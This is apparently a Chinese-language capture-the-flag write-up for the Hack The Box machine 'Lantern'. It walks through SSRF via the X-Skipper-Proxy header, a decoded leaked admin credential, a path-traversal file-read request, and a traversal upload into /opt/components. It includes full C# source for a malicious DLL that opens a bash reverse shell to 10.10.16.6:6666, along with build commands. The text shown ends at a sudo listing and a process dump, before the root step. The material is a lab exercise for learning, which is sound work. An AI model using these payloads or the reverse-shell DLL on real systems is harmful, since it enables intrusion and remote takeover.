Lantern
User
❯ nmap -A 10.129.10.189
Starting Nmap 7.95 ( https://nmap.org ) at 2024-08-21 19:52 CST
Stats: 0:00:42 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 42.70% done; ETC: 19:53 (0:00:52 remaining)
Stats: 0:01:27 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 90.93% done; ETC: 19:53 (0:00:08 remaining)
Stats: 0:01:27 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 91.23% done; ETC: 19:53 (0:00:08 remaining)
Stats: 0:01:27 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 91.43% done; ETC: 19:53 (0:00:08 remaining)
Nmap scan report for 10.129.10.189
Host is up (0.42s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 80:c9:47:d5:89:f8:50:83:02:5e:fe:53:30:ac:2d:0e (ECDSA)
|_ 256 d4:22:cf:fe:b1:00:cb:eb:6d:dc:b2:b4:64:6b:9d:89 (ED25519)
80/tcp open http Golang net/http server
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Content-Length: 207
| Content-Type: text/html; charset=utf-8
| Date: Wed, 21 Aug 2024 11:53:47 GMT
| Server: Skipper Proxy
| <!doctype html>
| <html lang=en>
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GenericLines, Help, LPDString, RTSPRequest, SSLSessionReq:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Content-Length: 225
| Content-Type: text/html; charset=utf-8
| Date: Wed, 21 Aug 2024 11:53:44 GMT
| Location: http://lantern.htb/
| Server: Skipper Proxy
| <!doctype html>
| <html lang=en>
| <title>Redirecting...</title>
| <h1>Redirecting...</h1>
| <p>You should be redirected automatically to the target URL: <a href="http://lantern.htb/">http://lantern.htb/</a>. If not, click the link.
| HTTPOptions:
| HTTP/1.0 200 OK
| Allow: HEAD, OPTIONS, GET
| Content-Length: 0
| Content-Type: text/html; charset=utf-8
| Date: Wed, 21 Aug 2024 11:53:45 GMT
|_ Server: Skipper Proxy
|_http-title: Did not follow redirect to http://lantern.htb/
|_http-server-header: Skipper Proxy
3000/tcp open http Microsoft Kestrel httpd
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: Kestrel
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.95%I=7%D=8/21%Time=66C5D548%P=arm-apple-darwin22.6.0%r(G
SF:etRequest,18F,"HTTP/1\.0\x20302\x20Found\r\nContent-Length:\x20225\r\nC
SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nDate:\x20Wed,\x2021\x20A
SF:ug\x202024\x2011:53:44\x20GMT\r\nLocation:\x20http://lantern\.htb/\r\nS
SF:erver:\x20Skipper\x20Proxy\r\n\r\n<!doctype\x20html>\n<html\x20lang=en>
SF:\n<title>Redirecting\.\.\.</title>\n<h1>Redirecting\.\.\.</h1>\n<p>You\
SF:x20should\x20be\x20redirected\x20automatically\x20to\x20the\x20target\x
SF:20URL:\x20<a\x20href=\"http://lantern\.htb/\">http://lantern\.htb/</a>\
SF:.\x20If\x20not,\x20click\x20the\x20link\.\n")%r(HTTPOptions,A5,"HTTP/1\
SF:.0\x20200\x20OK\r\nAllow:\x20HEAD,\x20OPTIONS,\x20GET\r\nContent-Length
SF::\x200\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nDate:\x20Wed,
SF:\x2021\x20Aug\x202024\x2011:53:45\x20GMT\r\nServer:\x20Skipper\x20Proxy
SF:\r\n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCont
SF:ent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r
SF:\n400\x20Bad\x20Request")%r(FourOhFourRequest,162,"HTTP/1\.0\x20404\x20
SF:Not\x20Found\r\nContent-Length:\x20207\r\nContent-Type:\x20text/html;\x
SF:20charset=utf-8\r\nDate:\x20Wed,\x2021\x20Aug\x202024\x2011:53:47\x20GM
SF:T\r\nServer:\x20Skipper\x20Proxy\r\n\r\n<!doctype\x20html>\n<html\x20la
SF:ng=en>\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</h1>\n<p>T
SF:he\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20server\.\
SF:x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x20check\x2
SF:0your\x20spelling\x20and\x20try\x20again\.</p>\n")%r(GenericLines,67,"H
SF:TTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20ch
SF:arset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(He
SF:lp,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plai
SF:n;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Reques
SF:t")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request
SF:\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20clo
SF:se\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 146.31 seconds
80
80 端口的服务 是golang 编写的
❯ curl http://lantern.htb -I
HTTP/1.1 200 OK
Content-Length: 12049
Content-Type: text/html; charset=utf-8
Date: Fri, 23 Aug 2024 03:31:22 GMT
Server: Skipper Proxy
Referer: https://www.exploit-db.com/exploits/51111
Skipper Proxy 存在ssrf , 主要通过http请求头 X-Skipper-Proxy 来控制 请求目标
X-Skipper-Proxy: http://169.254.169.254
❯ python3 -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:10.10.11.29 - - [23/Aug/2024 14:03:26] code 404, message File not found
::ffff:10.10.11.29 - - [23/Aug/2024 14:03:26] "GET http://lantern.htb:3000/evox/about HTTP/1.1" 404 -
发现最终的请求的path 为 host 头加 path
ssrf-portScan
GET / HTTP/1.1
Host: lantern.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN
Connection: keep-alive
X-Skipper-Proxy: http://lantern.htb:8000
通过fuzz X-Skipper-Proxy: http://lantern.htb:FUZZ 可以探测端口
❯ ffuf -request req -w port -c -v -t 1000 -request-proto http
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://lantern.htb/
:: Wordlist : FUZZ: /Users/a58/Documents/htb/machine/SeasonVI/linux/lantern/port
:: Header : Host: lantern.htb
:: Header : accept: */*
:: Header : User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
:: Header : Accept-Encoding: gzip, deflate, br
:: Header : Accept-Language: zh-CN
:: Header : X-Skipper-Proxy: http://lantern.htb:FUZZ
:: Header : Connection: keep-alive
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 1000
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
[Status: 500, Size: 22, Words: 3, Lines: 2, Duration: 2909ms]
| URL | http://lantern.htb/
* FUZZ: 22
[Status: 200, Size: 2847, Words: 334, Lines: 58, Duration: 2923ms]
| URL | http://lantern.htb/
* FUZZ: 3000
[Status: 200, Size: 1669, Words: 389, Lines: 50, Duration: 170ms]
| URL | http://lantern.htb/
* FUZZ: 5000
[Status: 200, Size: 12049, Words: 4549, Lines: 225, Duration: 2984ms]
| URL | http://lantern.htb/
* FUZZ: 80
[Status: 200, Size: 12049, Words: 4549, Lines: 225, Duration: 245ms]
| URL | http://lantern.htb/
* FUZZ: 8000
:: Progress: [1000/1000] :: Job [1/1] :: 2079 req/sec :: Duration: [0:00:03] :: Errors: 0 ::
扫描到了两个端口 5000,8000,端口列表用的是常见1000端口
8000端口实际就是80端口的业务
GET /_framework/InternaLantern.dll HTTP/1.1
Host: lantern.htb:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN
Connection: keep-alive
X-Skipper-Proxy: http://lantern.htb:5000
选中响应保存到文件中
或者使用curl 命令
╭─ ~/Documents/htb/machine/SeasonVI/linux/lantern 23 ✘ 16:16:25
╰─ curl http://lantern.htb/_framework/InternaLantern.dll -H "X-Skipper-Proxy: http://lantern.htb:5000" -o InternaLantern.dll
windows可以 使用dnspy 反编译 该文件 或者用这个 全平台都有下载链接
Referer: https://decompiler.codemerx.com/
decompile
里面有一个db文件的路径,尝试访问,并访问不到
base64-decode
这个文件中还有很多base64编码 尝试解码
SGVhZCBvZiBzYWxlcyBkZXBhcnRtZW50LCBlbWVyZ2VuY3kgY29udGFjdDogKzQ0MTIzNDU2NzgsIGVtYWlsOiBqb2huLnNAZXhhbXBsZS5jb20=
SFIsIGVtZXJnZW5jeSBjb250YWN0OiArNDQxMjM0NTY3OCwgZW1haWw6IGFubnkudEBleGFtcGxlLmNvbQ==
RnVsbFN0YWNrIGRldmVsb3BlciwgZW1lcmdlbmN5IGNvbnRhY3Q6ICs0NDEyMzQ1Njc4LCBlbWFpbDogY2F0aGVyaW5lLnJAZXhhbXBsZS5jb20=
UFIsIGVtZXJnZW5jeSBjb250YWN0OiArNDQxMjM0NTY3OCwgZW1haWw6IGxhcmEuc0BleGFtcGxlLmNvbQ==
SnVuaW9yIC5ORVQgZGV2ZWxvcGVyLCBlbWVyZ2VuY3kgY29udGFjdDogKzQ0MTIzNDU2NzgsIGVtYWlsOiBsaWxhLnNAZXhhbXBsZS5jb20=
U3lzdGVtIGFkbWluaXN0cmF0b3IsIEZpcnN0IGRheTogMjEvMS8yMDI0LCBJbml0aWFsIGNyZWRlbnRpYWxzIGFkbWluOkFKYkZBX1FAOTI1cDlhcCMyMi4gQXNrIHRvIGNoYW5nZSBhZnRlciBmaXJzdCBsb2dpbiE=
credential
Head of sales department, emergency contact: +4412345678, email: john.s@example.com
HR, emergency contact: +4412345678, email: anny.t@example.com
FullStack developer, emergency contact: +4412345678, email: catherine.r@example.com
PR, emergency contact: +4412345678, email: lara.s@example.com
Junior .NET developer, emergency contact: +4412345678, email: lila.s@example.com
System administrator, First day: 21/1/2024, Initial credentials admin:AJbFA_Q@925p9ap#22. Ask to change after first login!
使用该credentials 成功登陆3000端口服务 的 后台
在这里可以看到 app.py的源代码
app.py
from flask import Flask, render_template, send_file, request, redirect, json
from werkzeug.utils import secure_filename
import os
app=Flask("__name__")
@app.route('/')
def index():
if request.headers['Host'] != "lantern.htb":
return redirect("http://lantern.htb/", code=302)
return render_template("index.html")
@app.route('/vacancies')
def vacancies():
return render_template('vacancies.html')
@app.route('/submit', methods=['POST'])
def save_vacancy():
name = request.form.get('name')
email = request.form.get('email')
vacancy = request.form.get('vacancy', default='Middle Frontend Developer')
if 'resume' in request.files:
try:
file = request.files['resume']
resume_name = file.filename
if resume_name.endswith('.pdf') or resume_name == '':
filename = secure_filename(f"resume-{name}-{vacancy}-latern.pdf")
upload_folder = os.path.join(os.getcwd(), 'uploads')
destination = '/'.join([upload_folder, filename])
file.save(destination)
else:
return "Only PDF files allowed!"
except:
return "Something went wrong!"
return "Thank you! We will conact you very soon!"
@app.route('/PrivacyAndPolicy')
def sendPolicyAgreement():
lang = request.args.get('lang')
file_ext = request.args.get('ext')
try:
return send_file(f'/var/www/sites/localisation/{lang}.{file_ext}')
except:
return send_file(f'/var/www/sites/localisation/default/policy.pdf', 'application/pdf')
if __name__ == '__main__':
app.run(host='127.0.0.1', port=8000)
LFI
可以发现 80 端口的源代码逻辑,在PrivacyAndPolicy的路由存在文件读取漏洞
GET /PrivacyAndPolicy?lang=../../../../../../.&ext=/etc/hosts HTTP/1.1
Host: lantern.htb
Cache-Control: max-age=0
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
❯ cat passwd |grep bash
root:x:0:0:root:/root:/bin/bash
tomas:x:1000:1000:tomas:/home/tomas:/bin/bash
发现存在 shel权限的用户就只有两个 一个 是root ,另一个是tomas
在修改choose Modeule 的内容后 点击 Search 回显 了以下错误
可以发现,运行的路径是 /opt/components/…/…/…/…/…/…/…/…/…/etc/.dll
一开始这个位置的内容是Logs ,所以运行加载的路径就是 /opt/components/Logs.dll
/home/tomas/LanternAdmin/bin/Debug/net6.0/LanternAdmin.dll
用刚才的LFI漏洞 读取
经过分析,就是完成了web中那个 获取日志信息的功能的实现
所以这里可以执行在 /opt/components/ + 我们传入的内容 + .dll 的 文件
所以我们需要编写一个恶意的dll 并且想办法把他穿到目标机器上
how to Upload
首先解决如何传一个文件的问题
因为该web业务是用 blazor 框架的,该框架运用 Web Assembly的方式来运行
Referer: https://www.aon.com/cyber-solutions/aon_cyber_labs/new_burp_suite_extension_blazortrafficprocessor/
根据这篇文章的内容 ,我们可以知道 可以通过burp商店下载一个 Blazor流数据转换到 json,或者json转换到 blazor流数据
随便上传一个文件
抓下面两个包到repeater
package 1
这个包表示文件上传内容的属性,包括文件名时间大小等等,把这个包发到BTP插件中去
先反序列化
把name从ReverseBash.dll修改为 …/…/…/…/…/…/…/…/…/…/…/…/…/…/opt/components/ReverseBash.dll
这样就可以跨目录上传到 /opt/components 下了
然后把序列化后到内容 替换掉body掉部分,先重放package1 然后再重放package 2
package 2
这个包就是实际的要上传文件内容
下面为上传到代码具体内容
ReveseBash.cs
using System;
using System.Diagnostics;
namespace ReverseBash {
class ReverseBash {
public static void Main(string[] args) {
Process proc = new System.Diagnostics.Process();
proc.StartInfo.FileName = "bash";
proc.StartInfo.Arguments = "-c \"bash -i >& /dev/tcp/10.10.16.6/6666 0>&1\"";
proc.StartInfo.UseShellExecute = false;
proc.StartInfo.RedirectStandardOutput = true;
proc.Start();
while (!proc.StandardOutput.EndOfStream) {
Console.WriteLine(proc.StandardOutput.ReadLine());
}
}
}
}
编译命令为
csc /target:library /out:ReverseBash.dll /platform:x64 ReverseBash.cs
上传成功后,尝试加载该dll
发现显示缺失Component 类的提示
回去开 之前下载下来的 Logs.dll 发现泪目为Component,并且存在 BuildRenderTree 函数,应该是web会加载这个函数
所以我们需要按照我们下载回来的这个dll 的格式写一个恶意的dll
dotnet sdk
https://dotnet.microsoft.com/zh-cn/download/dotnet/thank-you/sdk-6.0.425-linux-x64-binaries
dotnet new classlib -n test
ReverseShell.cs
using System;
using System.Diagnostics;
using Microsoft.AspNetCore.Components;
using Microsoft.AspNetCore.Components.Rendering;
namespace test{
public class Component : ComponentBase{
protected override void BuildRenderTree(RenderTreeBuilder __builder) {
// 静态构造函数的代码在这里
// 这将在类首次加载时执行
Process proc = new System.Diagnostics.Process();
proc.StartInfo.FileName = "bash";
proc.StartInfo.Arguments = "-c \"bash -i >& /dev/tcp/10.10.16.6/6666 0>&1\"";
proc.StartInfo.UseShellExecute = false;
proc.StartInfo.RedirectStandardOutput = true;
proc.Start();
while (!proc.StandardOutput.EndOfStream) {
Console.WriteLine(proc.StandardOutput.ReadLine());
}
}
}
}
~
dotnet add package Microsoft.AspNetCore.Components --version 6.0.0 && \
dotnet add package Microsoft.AspNetCore.Components.Web --version 6.0.0
dotnet build -c release
上传/bin/release/net6.0的dll即可
然后加载这个dll
Root
tomas@lantern:~$ sudo -l
Matching Defaults entries for tomas on lantern:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User tomas may run the following commands on lantern:
(ALL : ALL) NOPASSWD: /usr/bin/procmon
tomas@lantern:~$
tomas@lantern:~$ ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 Aug26 ? 00:00:05 /sbin/init
root 2 0 0 Aug26 ? 00:00:00 [kthreadd]
root 3 2 0 Aug26 ? 00:00:00 [rcu_gp]
root 4 2 0 Aug26 ? 00:00:00 [rcu_par_gp]
root 5 2 0 Aug26 ? 00:00:00 [slub_flushwq]
root 6 2 0 Aug26 ? 00:00:00 [netns]
root 8 2 0 Aug26 ? 00:00:00 [kworker/0:0H-events_highpri]
root 10 2 0 Aug26 ? 00:00:00 [mm_percpu_wq]
root 11 2 0 Aug26 ? 00:00:00 [rcu_tasks_rude_]
root 12 2 0 Aug26 ? 00:00:00 [rcu_tasks_trace]
root 13 2 0 Aug26 ? 00:00:00 [ksoftirqd/0]
root 14 2 0 Aug26 ? 00:00:04 [rcu_sched]
root 15 2 0 Aug26 ? 00:00:00 [migration/0]
root 16 2 0 Aug26 ? 00:00:00 [idle_inject/0]
root 18 2 0 Aug26 ? 00:00:00 [cpuhp/0]
root 19 2 0 Aug26 ? 00:00:00 [cpuhp/1]
root 20 2 0 Aug26 ? 00:00:00 [idle_inject/1]
root 21 2 0 Aug26 ? 00:00:00 [migration/1]
root 22 2 0 Aug26 ? 00:00:00 [ksoftirqd/1]
root 24 2 0 Aug26 ? 00:00:00 [kworker/1:0H-events_highpri]
root 25 2 0 Aug26 ? 00:00:00 [kdevtmpfs]
root 26 2 0 Aug26 ? 00:00:00 [inet_frag_wq]
root 27 2 0 Aug26 ? 00:00:00 [kauditd]
root 29 2 0 Aug26 ? 00:00:00 [khungtaskd]
root 30 2 0 Aug26 ? 00:00:00 [oom_reaper]
root 31 2 0 Aug26 ? 00:00:00 [writeback]
root 32 2 0 Aug26 ? 00:00:01 [kcompactd0]
root 33 2 0 Aug26 ? 00:00:00 [ksmd]
root 34 2 0 Aug26 ? 00:00:00 [khugepaged]
root 81 2 0 Aug26 ? 00:00:00 [kintegrityd]
root 82 2 0 Aug26 ? 00:00:00 [kblockd]
root 83 2 0 Aug26 ? 00:00:00 [blkcg_punt_bio]
root 84 2 0 Aug26 ? 00:00:00 [tpm_dev_wq]
root 85 2 0 Aug26 ? 00:00:00 [ata_sff]
root 86 2 0 Aug26 ? 00:00:00 [md]
root 87 2 0 Aug26 ? 00:00:00 [edac-poller]
root 88 2 0 Aug26 ? 00:00:00 [devfreq_wq]
root 89 2 0 Aug26 ? 00:00:00 [watchdogd]
root 91 2 0 Aug26 ? 00:00:00 [kworker/0:1H-kblockd]
root 93 2 0 Aug26 ? 00:00:00 [kswapd0]
root 94 2 0 Aug26 ? 00:00:00 [ecryptfs-kthrea]
root 96 2 0 Aug26 ? 00:00:00 [kthrotld]
root 97 2 0 Aug26 ? 00:00:00 [irq/24-pciehp]
root 98 2 0 Aug26 ? 00:00:00 [irq/25-pciehp]
root 99 2 0 Aug26 ? 00:00:00 [irq/26-pciehp]
root 100 2 0 Aug26 ? 00:00:00 [irq/27-pciehp]
root 101 2 0 Aug26 ? 00:00:00 [irq/28-pciehp]
root 102 2 0 Aug26 ? 00:00:00 [irq/29-pciehp]
root 103 2 0 Aug26 ? 00:00:00 [irq/30-pciehp]
root 104 2 0 Aug26 ? 00:00:00 [irq/31-pciehp]
root 105 2 0 Aug26 ? 00:00:00 [irq/32-pciehp]
root 106 2 0 Aug26 ? 00:00:00 [irq/33-pciehp]
root 107 2 0 Aug26 ? 00:00:00 [irq/34-pciehp]
root 108 2 0 Aug26 ? 00:00:00 [irq/35-pciehp]
root 109 2 0 Aug26 ? 00:00:00 [irq/36-pciehp]
root 110 2 0 Aug26 ? 00:00:00 [irq/37-pciehp]
root 111 2 0 Aug26 ? 00:00:00 [irq/38-pciehp]
root 112 2 0 Aug26 ? 00:00:00 [irq/39-pciehp]
root 113 2 0 Aug26 ? 00:00:00 [irq/40-pciehp]
root 114 2 0 Aug26 ? 00:00:00 [irq/41-pciehp]
root 115 2 0 Aug26 ? 00:00:00 [irq/42-pciehp]
root 116 2 0 Aug26 ? 00:00:00 [irq/43-pciehp]
root 117 2 0 Aug26 ? 00:00:00 [irq/44-pciehp]
root 118 2 0 Aug26 ? 00:00:00 [irq/45-pciehp]
root 119 2 0 Aug26 ? 00:00:00 [irq/46-pciehp]
root 120 2 0 Aug26 ? 00:00:00 [irq/47-pciehp]
root 121 2 0 Aug26 ? 00:00:00 [irq/48-pciehp]
root 122 2 0 Aug26 ? 00:00:00 [irq/49-pciehp]
root 123 2 0 Aug26 ? 00:00:00 [irq/50-pciehp]
root 124 2 0 Aug26 ? 00:00:00 [irq/51-pciehp]
root 125 2 0 Aug26 ? 00:00:00 [irq/52-pciehp]
root 126 2 0 Aug26 ? 00:00:00 [irq/53-pciehp]
root 127 2 0 Aug26 ? 00:00:00 [irq/54-pciehp]
root 128 2 0 Aug26 ? 00:00:00 [irq/55-pciehp]
root 129 2 0 Aug26 ? 00:00:00 [acpi_thermal_pm]
root 131 2 0 Aug26 ? 00:00:00 [scsi_eh_0]
root 132 2 0 Aug26 ? 00:00:00 [scsi_tmf_0]
root 133 2 0 Aug26 ? 00:00:00 [scsi_eh_1]
root 134 2 0 Aug26 ? 00:00:00 [scsi_tmf_1]
root 136 2 0 Aug26 ? 00:00:00 [vfio-irqfd-clea]
root 137 2 0 Aug26 ? 00:00:00 [mld]
root 138 2 0 Aug26 ? 00:00:00 [kworker/1:1H-kblockd]
root 139 2 0 Aug26 ? 00:00:00 [ipv6_addrconf]
root 150 2 0 Aug26 ? 00:00:00 [kstrp]
root 153 2 0 Aug26 ? 00:00:00 [zswap-shrink]
root 155 2 0 Aug26 ? 00:00:00 [kworker/u257:0]
root 160 2 0 Aug26 ? 00:00:00 [charger_manager]
root 205 2 0 Aug26 ? 00:00:00 [scsi_eh_2]
root 206 2 0 Aug26 ? 00:00:00 [mpt_poll_0]
root 207 2 0 Aug26 ? 00:00:00 [mpt/0]
root 208 2 0 Aug26 ? 00:00:00 [scsi_tmf_2]
root 209 2 0 Aug26 ? 00:00:00 [scsi_eh_3]
root 210 2 0 Aug26 ? 00:00:00 [scsi_tmf_3]
root 211 2 0 Aug26 ? 00:00:00 [scsi_eh_4]
root 212 2 0 Aug26 ? 00:00:00 [scsi_tmf_4]
root 213 2 0 Aug26 ? 00:00:00 [scsi_eh_5]
root 214 2 0 Aug26 ? 00:00:00 [ttm_swap]
root 215 2 0 Aug26 ? 00:00:00 [scsi_tmf_5]
root 216 2 0 Aug26 ? 00:00:00 [scsi_eh_6]
root 217 2 0 Aug26 ? 00:00:02 [irq/16-vmwgfx]
root 218 2 0 Aug26 ? 00:00:00 [scsi_tmf_6]
root 219 2 0 Aug26 ? 00:00:00 [scsi_eh_7]
root 220 2 0 Aug26 ? 00:00:00 [scsi_tmf_7]
root 221 2 0 Aug26 ? 00:00:00 [scsi_eh_8]
root 222 2 0 Aug26 ? 00:00:00 [scsi_tmf_8]
root 223 2 0 Aug26 ? 00:00:00 [scsi_eh_9]
root 224 2 0 Aug26 ? 00:00:00 [card0-crtc0]
root 225 2 0 Aug26 ? 00:00:00 [scsi_tmf_9]
root 226 2 0 Aug26 ? 00:00:00 [card0-crtc1]
root 227 2 0 Aug26 ? 00:00:00 [card0-crtc2]
root 230 2 0 Aug26 ? 00:00:00 [scsi_eh_10]
root 231 2 0 Aug26 ? 00:00:00 [card0-crtc3]
root 237 2 0 Aug26 ? 00:00:00 [scsi_tmf_10]
root 238 2 0 Aug26 ? 00:00:00 [card0-crtc4]
root 240 2 0 Aug26 ? 00:00:00 [card0-crtc5]
root 241 2 0 Aug26 ? 00:00:00 [scsi_eh_11]
root 244 2 0 Aug26 ? 00:00:00 [scsi_tmf_11]
root 245 2 0 Aug26 ? 00:00:00 [card0-crtc6]
root 246 2 0 Aug26 ? 00:00:00 [cryptd]
root 247 2 0 Aug26 ? 00:00:00 [scsi_eh_12]
root 249 2 0 Aug26 ? 00:00:00 [scsi_tmf_12]
root 250 2 0 Aug26 ? 00:00:00 [scsi_eh_13]
root 251 2 0 Aug26 ? 00:00:00 [card0-crtc7]
root 255 2 0 Aug26 ? 00:00:00 [scsi_tmf_13]
root 256 2 0 Aug26 ? 00:00:00 [scsi_eh_14]
root 257 2 0 Aug26 ? 00:00:00 [scsi_tmf_14]
root 260 2 0 Aug26 ? 00:00:00 [scsi_eh_15]
root 263 2 0 Aug26 ? 00:00:00 [scsi_tmf_15]
root 277 2 0 Aug26 ? 00:00:00 [scsi_eh_16]
root 278 2 0 Aug26 ? 00:00:00 [scsi_tmf_16]
root 280 2 0 Aug26 ? 00:00:00 [scsi_eh_17]
root 284 2 0 Aug26 ? 00:00:00 [scsi_tmf_17]
root 285 2 0 Aug26 ? 00:00:00 [scsi_eh_18]
root 286 2 0 Aug26 ? 00:00:00 [scsi_tmf_18]
root 289 2 0 Aug26 ? 00:00:00 [scsi_eh_19]
root 291 2 0 Aug26 ? 00:00:00 [scsi_tmf_19]
root 295 2 0 Aug26 ? 00:00:00 [scsi_eh_20]
root 297 2 0 Aug26 ? 00:00:00 [scsi_tmf_20]
root 299 2 0 Aug26 ? 00:00:00 [scsi_eh_21]
root 300 2 0 Aug26 ? 00:00:00 [scsi_tmf_21]
root 302 2 0 Aug26 ? 00:00:00 [scsi_eh_22]
root 303 2 0 Aug26 ? 00:00:00 [scsi_tmf_22]
root 304 2 0 Aug26 ? 00:00:00 [scsi_eh_23]
root 307 2 0 Aug26 ? 00:00:00 [scsi_tmf_23]
root 309 2 0 Aug26 ? 00:00:00 [scsi_eh_24]
root 310 2 0 Aug26 ? 00:00:00 [scsi_tmf_24]
root 311 2 0 Aug26 ? 00:00:00 [scsi_eh_25]
root 312 2 0 Aug26 ? 00:00:00 [scsi_tmf_25]
root 313 2 0 Aug26 ? 00:00:00 [scsi_eh_26]
root 314 2 0 Aug26 ? 00:00:00 [scsi_tmf_26]
root 315 2 0 Aug26 ? 00:00:00 [scsi_eh_27]
root 316 2 0 Aug26 ? 00:00:00 [scsi_tmf_27]
root 317 2 0 Aug26 ? 00:00:00 [scsi_eh_28]
root 318 2 0 Aug26 ? 00:00:00 [scsi_tmf_28]
root 319 2 0 Aug26 ? 00:00:00 [scsi_eh_29]
root 320 2 0 Aug26 ? 00:00:00 [scsi_tmf_29]
root 321 2 0 Aug26 ? 00:00:00 [scsi_eh_30]
root 322 2 0 Aug26 ? 00:00:00 [scsi_tmf_30]
root 323 2 0 Aug26 ? 00:00:00 [scsi_eh_31]
root 324 2 0 Aug26 ? 00:00:00 [scsi_tmf_31]
root 352 2 0 Aug26 ? 00:00:00 [scsi_eh_32]
root 353 2 0 Aug26 ? 00:00:00 [scsi_tmf_32]
root 394 2 0 Aug26 ? 00:00:00 [raid5wq]
root 452 2 0 Aug26 ? 00:00:00 [jbd2/sda2-8]
root 453 2 0 Aug26 ? 00:00:00 [ext4-rsv-conver]
root 511 1 0 Aug26 ? 00:00:05 /lib/systemd/systemd-journald
root 542 2 0 Aug26 ? 00:00:00 [kaluad]
root 543 2 0 Aug26 ? 00:00:00 [kmpath_rdacd]
root 545 2 0 Aug26 ? 00:00:00 [kmpathd]
root 546 2 0 Aug26 ? 00:00:00 [kmpath_handlerd]
root 549 1 0 Aug26 ? 00:00:02 /sbin/multipathd -d -s
root 551 1 0 Aug26 ? 00:00:00 /lib/systemd/systemd-udevd
systemd+ 594 1 0 Aug26 ? 00:00:01 /lib/systemd/systemd-timesyncd
root 599 1 0 Aug26 ? 00:00:02 /sbin/auditd
systemd+ 608 1 0 Aug26 ? 00:00:00 /lib/systemd/systemd-networkd
_laurel 611 599 0 Aug26 ? 00:00:08 /usr/local/sbin/laurel --config /etc/laurel/config.toml
root 635 1 0 Aug26 ? 00:00:00 /usr/bin/VGAuthService
root 636 1 0 Aug26 ? 00:00:32 /usr/bin/vmtoolsd
systemd+ 648 1 0 Aug26 ? 00:00:04 /lib/systemd/systemd-resolved
root 659 2 0 Aug26 ? 00:00:00 [audit_prune_tre]
root 725 1 0 Aug26 ? 00:00:00 /sbin/dhclient -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.et
message+ 835 1 0 Aug26 ? 00:00:00 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
www-data 838 1 0 Aug26 ? 00:00:06 python3 /var/www/sites/lantern.htb/app.py
www-data 840 1 0 Aug26 ? 00:00:13 dotnet run
root 841 1 0 Aug26 ? 00:00:01 /usr/sbin/irqbalance --foreground
